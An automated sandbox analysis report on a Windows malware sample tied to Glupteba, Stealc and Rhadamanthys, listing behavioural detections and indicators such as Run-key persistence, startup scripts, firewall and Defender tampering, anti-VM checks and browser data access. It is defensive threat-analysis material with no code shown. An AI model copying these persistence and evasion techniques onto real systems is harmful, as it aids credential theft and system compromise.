Analysis Overview
SHA256
627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3
Threat Level: Known bad
The file 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
Modifies firewall policy service
Windows security bypass
Suspicious use of NtCreateUserProcessOtherParentProcess
Stealc
Glupteba
Rhadamanthys
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
Detects executables containing artifacts associated with disabling Windows Defender
Modifies boot configuration data using bcdedit
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.
Detects Windows executables referencing non-Windows User-Agents
Detects executables referencing many varying, potentially fake Windows User-Agents
Detects executables (downloaders) containing URLs to raw contents of a paste
UPX dump on OEP (original entry point)
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Detects executables containing a Discord URL observed in first-stage droppers
Detect binaries embedding considerable number of MFA browser extension IDs.
Detects executables packed with Themida
Detects executables containing URLs to raw contents of a Github gist
Possible attempt to disable PatchGuard
Drops file in Drivers directory
Modifies Windows Firewall
Downloads MZ/PE file
Blocklisted process makes network request
Executes dropped EXE
Reads data files stored by FTP clients
UPX packed file
Reads user/profile data of web browsers
Loads dropped DLL
Windows security modification
Checks BIOS information in registry
Checks computer location settings
Drops startup file
Themida packer
Manipulates WinMon driver.
Looks up external IP address via web service
Manipulates WinMonFS driver.
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates connected drives
Drops desktop.ini file(s)
Checks whether UAC is enabled
Drops Chrome extension
Adds Run key to start application
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Uses Task Scheduler COM API
Runs ping.exe
Enumerates system info in registry
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Modifies system certificate store
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-28 02:19
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-28 02:19
Reported
2024-03-28 02:21
Platform
win10v2004-20231215-en
Max time kernel
150s
Max time network
148s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
Rhadamanthys
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1108 created 2600 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\system32\sihost.exe |
Detect binaries embedding considerable number of MFA browser extension IDs.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Windows executables referencing non-Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables (downloaders) containing URLs to raw contents of a paste
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables containing a Discord URL observed in first-stage droppers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables containing URLs to raw contents of a Github gist
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables containing artifacts associated with disabling Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables packed with Themida
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many varying, potentially fake Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
UPX dump on OEP (original entry point)
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS882B.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\GJJottccSrZvHDi2rOc2biM9.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS882B.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\u2dw.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OGw3iVRtVTorDTvrZWVFIRH3.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SrW2mPdLSg31OAH841w73qcw.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Pm05pTLuUdC7FMJ85g9crRy7.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jFDWS62MuE8dcLg86cb2VlF5.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wj1sBVa2SKVzIVUuIxyRFx1k.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ym0cIneygugXMnSzap6duAZS.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GBvKxHnoVQeTRn9daTavP9xw.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ycX4zOch6JksPqX8gcvOQIqE.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VAyBqnC6d2btBn1GERznlHjO.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1Jj9NBgyCRfcZudsJjLMwpnm.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xecqa4DAy7lCYCKQpjOuHDrT.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\GUfrwuhZbYaOvK64ZU92F4kb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zSC340.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS882B.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\puXYKqB.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\KQwfUoo.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\UeBGJdQZVUuurvvrtFOtjUqE.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3300 set thread context of 1472 | N/A | C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe |
| PID 2244 set thread context of 1108 | N/A | C:\Users\Admin\Pictures\O0CPJ0FFbJ7m6QGvaPcCCRWK.exe | C:\Users\Admin\Pictures\WZ5cX3pyFhvxZFq1AmkufeHv.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe | N/A |
